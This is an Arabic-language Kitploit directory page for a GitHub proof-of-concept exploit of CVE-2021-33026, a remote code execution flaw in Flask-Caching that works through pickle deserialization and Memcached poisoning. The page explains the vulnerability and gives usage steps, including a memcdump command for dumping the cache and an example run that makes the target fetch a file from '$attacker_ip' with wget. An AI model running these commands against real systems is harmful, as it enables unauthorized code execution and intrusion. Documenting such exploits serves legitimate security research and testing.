Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-33026 — تنفيذ التعليمات البرمجية عن بُعد عبر Pickle Serialization - تسميم Memcached | Kitploit
أدوات/GitHubGitHub/carlosg13/cve-2021-33026
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubcarlosg13/cve-2021-33026

CVE-2021-33026

تنفيذ التعليمات البرمجية عن بُعد عبر Pickle Serialization - تسميم Memcached

عرض المستودع
417منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-33026

استغلال تنفيذ التعليمات البرمجية عن بعد عبر تسلسل Pickle - تسمم Memcached PoC

ما هو CVE-2021-33026؟

"إضافة Flask-Caching حتى الإصدار 1.10.1 لـ Flask تعتمد على Pickle في التسلسل، مما قد يؤدي إلى تنفيذ تعليمات برمجية عن بعد أو تصعيد الامتيازات محلياً. إذا تمكن مهاجم من الوصول إلى مخزن التخزين المؤقت (مثل نظام الملفات، Memcached، Redis، إلخ)، يمكنه بناء حمولة مفبركة، وتسميم التخزين المؤقت، وتنفيذ كود Python."

ما هي وظيفة مكتبة Pickle؟

"تُستخدم Pickle في Python بشكل أساسي لتسلسل وإلغاء تسلسل بنية كائن Python. بمعنى آخر، هي عملية تحويل كائن Python إلى تيار بايت لتخزينه في ملف/قاعدة بيانات، أو الحفاظ على حالة البرنامج عبر الجلسات، أو نقل البيانات عبر الشبكة."

ما هو Memcached؟

"Memcached هو نظام تخزين مؤقت موزع للأغراض العامة. يُستخدم غالباً لتسريع مواقع الويب الديناميكية المعتمدة على قواعد البيانات عن طريق تخزين البيانات والكائنات مؤقتاً في الذاكرة (RAM) لتقليل عدد مرات قراءة مصدر البيانات الخارجي."

[!] الاستغلال:

1. لكي يعمل الاستغلال، من الضروري توفير كوكي جلسة، لماذا؟ في هذا المفهوم الإثباتي لدينا حالة يتم فيها إدارة أو تخزين كوكي الجلسة لتطبيق Flask ضعيف بواسطة خدمة memcached:

memcdump --servers=target_machine_ip_address

imagen

2. استخدام الأداة:

-h --> قائمة المساعدة

--cmd --> الأمر الذي سيتم تنفيذه على الجهاز الهدف

--rhost --> عنوان IP للجهاز الهدف

--rport --> منفذ الجهاز الهدف

--cookie --> كوكي الجلسة الفعلية الخاصة بك من تطبيق Flask الضعيف. مثال: session:58e61600-9ecf-45b8-b7b8-db2f0a00f421

3. تشغيل الأداة:

python3 cve-2021-33026_PoC.py --rhost $target_machine_ip_address --rport $target_machine_port --cmd "wget $attacker_ip/picke_memcached_posisoning_exploit" --cookie "session:58e61600-9ecf-45b8-b7b8-db2f0a00f421"

imagen imagen

المراجع:

https://nvd.nist.gov/vuln/detail/CVE-2021-33026

https://github.com/pallets-eco/flask-caching/pull/209

https://www.synopsys.com/blogs/software-security/python-pickling/

تنزيل الأداة